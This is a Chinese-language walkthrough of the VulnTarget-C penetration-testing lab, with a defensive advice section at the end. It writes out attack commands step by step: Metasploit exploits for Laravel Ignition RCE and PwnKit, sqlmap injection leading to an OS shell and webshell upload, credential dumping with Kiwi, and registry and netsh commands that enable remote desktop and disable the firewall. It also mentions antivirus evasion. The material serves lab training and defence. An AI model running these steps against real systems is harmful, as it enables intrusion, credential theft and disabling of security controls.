vulntarget-c
字数 1295 2025-08-12 11:34:16
VulnTarget-C 靶场实战教学文档
一、靶场概述
VulnTarget-C 是一个模拟真实网络环境的靶场,包含外网和内网渗透场景,涉及以下技术点:
- Laravel 框架漏洞利用
- Linux 提权技术
- 内网横向移动
- Windows 提权技术
- 代理与路由配置
二、初始信息收集
1. 端口扫描
使用 nmap 进行初始扫描:
nmap -sC -sV -Pn 192.168.25.137
发现开放端口:
- 22 (SSH)
- 80 (HTTP)
2. Web 应用识别
访问 80 端口发现使用 Laravel 框架
三、Laravel 漏洞利用
1. 漏洞识别
目标存在 Laravel Ignition 远程代码执行漏洞 (CVE-2021-3129)
2. Metasploit 利用
使用 Metasploit 模块:
use exploit/multi/php/ignition_laravel_debug_rce
set RHOSTS 192.168.25.137
exploit
成功获取初始 shell
四、Linux 提权
1. 提权建议
使用 Metasploit 的提权建议模块:
use post/multi/recon/local_exploit_suggester
set SESSION <session_id>
run
2. PwnKit 提权 (CVE-2021-4034)
使用 Metasploit 模块:
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set SESSION <session_id>
exploit
成功获取 root 权限
五、内网渗透准备
1. 网络探测
run get_local_subnets
发现内网网段:10.0.20.0/24
2. 路由配置
run post/multi/manage/autoroute
3. 代理设置
创建代理通道以便访问内网资源
六、内网横向移动
1. 发现内网主机
探测到内网主机:10.0.20.100
2. Web 应用漏洞利用
目标存在 SQL 注入漏洞:
sqlmap -u "http://10.0.20.100/admin/inquiries/view_details.php?id=1*" --random-agent
确认 DBA 权限后获取 os-shell:
sqlmap -u "http://10.0.20.100/admin/inquiries/view_details.php?id=1*" --os-shell
3. WebShell 上传
通过 os-shell 上传 WebShell
4. 信息收集
发现系统运行 Defender 杀毒软件
5. 免杀处理
制作免杀 payload 上线 Metasploit
七、Windows 系统提权
1. 凭证获取
使用 Kiwi 模块抓取密码:
load kiwi
lsa_dump_sam
2. 远程桌面配置
开启远程桌面:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. 防火墙配置
关闭防火墙:
netsh firewall set opmode mode=disable
重置防火墙:
netsh firewall reset
查看状态:
Netsh Advfirewall show allprofiles
4. 远程登录
使用获取的凭证登录远程桌面
5. 发现新内网主机
在应用程序中发现新内网主机:10.0.10.110
八、最终提权
使用与之前类似的提权方法获取最高权限
九、关键知识点总结
-
Laravel 漏洞利用:
- CVE-2021-3129 漏洞利用
- Metasploit 模块选择与配置
-
Linux 提权技术:
- 本地提权建议收集
- PwnKit (CVE-2021-4034) 漏洞利用
-
内网渗透技术:
- 路由与代理配置
- 内网主机发现
- SQL 注入到系统权限获取
-
Windows 提权技术:
- 凭证获取 (Kiwi)
- 远程桌面配置
- 防火墙操作
-
免杀技术:
- 针对 Defender 的免杀处理
十、防御建议
-
针对 Laravel 漏洞:
- 及时更新 Laravel 框架
- 关闭调试模式
-
针对 Linux 系统:
- 及时更新系统补丁
- 限制 pkexec 等特权程序的使用
-
针对 Windows 系统:
- 启用强密码策略
- 限制远程桌面访问
- 保持杀毒软件更新
-
网络防御:
- 实施网络分段
- 监控异常流量
- 限制内网主机间的通信
-
Web 应用防御:
- 输入验证与参数化查询
- 最小权限原则
- 定期安全审计